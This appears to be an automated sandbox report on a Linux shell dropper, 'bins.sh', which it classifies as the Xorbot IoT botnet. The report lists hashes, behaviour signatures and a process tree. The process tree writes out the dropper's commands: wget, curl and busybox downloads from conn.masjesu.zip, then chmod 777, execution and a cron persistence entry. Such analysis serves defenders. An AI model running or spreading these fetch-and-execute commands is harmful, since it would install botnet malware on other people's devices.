Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    28/02/2025, 11:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    1c04224c31369b92267e0f914de6faa7

  • SHA1

    a83724c5b8610fae0d070df43be47b501af8c44b

  • SHA256

    27e10f92af7087a71e53ea4397ca1048fae7141974622a595a9fc358c187cd8f

  • SHA512

    f84f0a3d4f25e30aa0b396a8212e44194c1787f5af184c2a20ded76d3b1dc36e52a38c1c8c16ea6d5263807375dbc8fdfc92de6b4f116b68f16650655288b542

  • SSDEEP

    96:YjvjDjZLwsIL8AjnqinuOCaELKCsHA82U99vLv+vuvBGjm9gcSLwsFQMuBSBqBqs:S4H7qAKosvdGrDIF4

Score
10/10
xorbotbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • Detects Xorbot 3 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 4 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalation
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 13 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    • Renames itself
    • Reads runtime system information
    PID:1510
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:1511
      • /usr/bin/wget
        wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1512
      • /usr/bin/curl
        curl -O http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1516
      • /bin/busybox
        /bin/busybox wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1518
      • /bin/chmod
        chmod 777 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • File and Directory Permissions Modification
        PID:1519
      • /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        ./6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
          PID:1520
        • /bin/rm
          rm 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
          2⤵
            PID:1522
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:1523
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:1524
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:1526
          • /bin/chmod
            chmod 777 tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
            • File and Directory Permissions Modification
            PID:1527
          • /tmp/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            ./tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
            2⤵
              PID:1528
            • /bin/rm
              rm tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
              2⤵
                PID:1530
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:1531
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:1532
              • /bin/busybox
                /bin/busybox wget http://conn.masjesu.zip/bins/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:1534
              • /bin/chmod
                chmod 777 j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                • File and Directory Permissions Modification
                PID:1535
              • /tmp/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                ./j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                2⤵
                  PID:1536
                • /bin/rm
                  rm j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                  2⤵
                    PID:1538
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1539
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1540
                  • /bin/busybox
                    /bin/busybox wget http://conn.masjesu.zip/bins/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:1542
                  • /bin/chmod
                    chmod 777 jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                    2⤵
                    • File and Directory Permissions Modification
                    PID:1543
                  • /usr/bin/crontab
                    crontab -l
                    2⤵
                      PID:1547
                    • /usr/bin/crontab
                      crontab -
                      2⤵
                      • Creates/modifies Cron job
                      PID:1549
                    • /bin/rm
                      rm jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      2⤵
                        PID:1551
                      • /usr/bin/wget
                        wget http://conn.masjesu.zip/bins/Lh2XFnF0IQ4hRp0Ecm8nGBqLKD7wLDvUo7
                        2⤵
                        • System Network Configuration Discovery
                        PID:1554

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
                      Filesize

                      119KB

                      MD5

                      1b166b95f9cb4b079ef1b9ec8363ddf3

                      SHA1

                      0d8eb08add467b3b5474f9b25909297fe7c2839c

                      SHA256

                      94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                      SHA512

                      983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

                      Download Submit

                    • /tmp/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh
                      Filesize

                      122KB

                      MD5

                      cd3d4b9c643e5b473fb4d88ed05f0716

                      SHA1

                      64ee7a97418583d759eaea8000890cc3bae1b5f4

                      SHA256

                      0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                      SHA512

                      164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                      Download Submit

                    • /tmp/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN
                      Filesize

                      99KB

                      MD5

                      9438d9bc392bcf300a5583b6df5bc8f6

                      SHA1

                      375a6ae34b516f6f3eeea8030c4084f585017efa

                      SHA256

                      68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

                      SHA512

                      1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

                      Download Submit

                    • /tmp/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                      Filesize

                      151KB

                      MD5

                      6c583043d91c55aa470c08c87058e917

                      SHA1

                      abf65a5b9bba69980278ad09356e53de8bb89439

                      SHA256

                      2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                      SHA512

                      82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                      Download Submit

                    • /var/spool/cron/crontabs/tmp.kxiaYZ
                      Filesize

                      210B

                      MD5

                      077a8703169311bb58b8dc6f3872b5ef

                      SHA1

                      1a6e0f3e16e1e21d753d4789d1058438379812f0

                      SHA256

                      8d9d7ac5f9b41925d157d40ada63636ac21e0bb928d26a64375924a65739201d

                      SHA512

                      75bf5d7195c1fb70981bb554dceb393ac32e59b25ef220dd02f5d4473c101bd6a06e2f847f51784188d87633e08ef045ee29933ef9738d603566c59bbd9ac7c3

                      Download Submit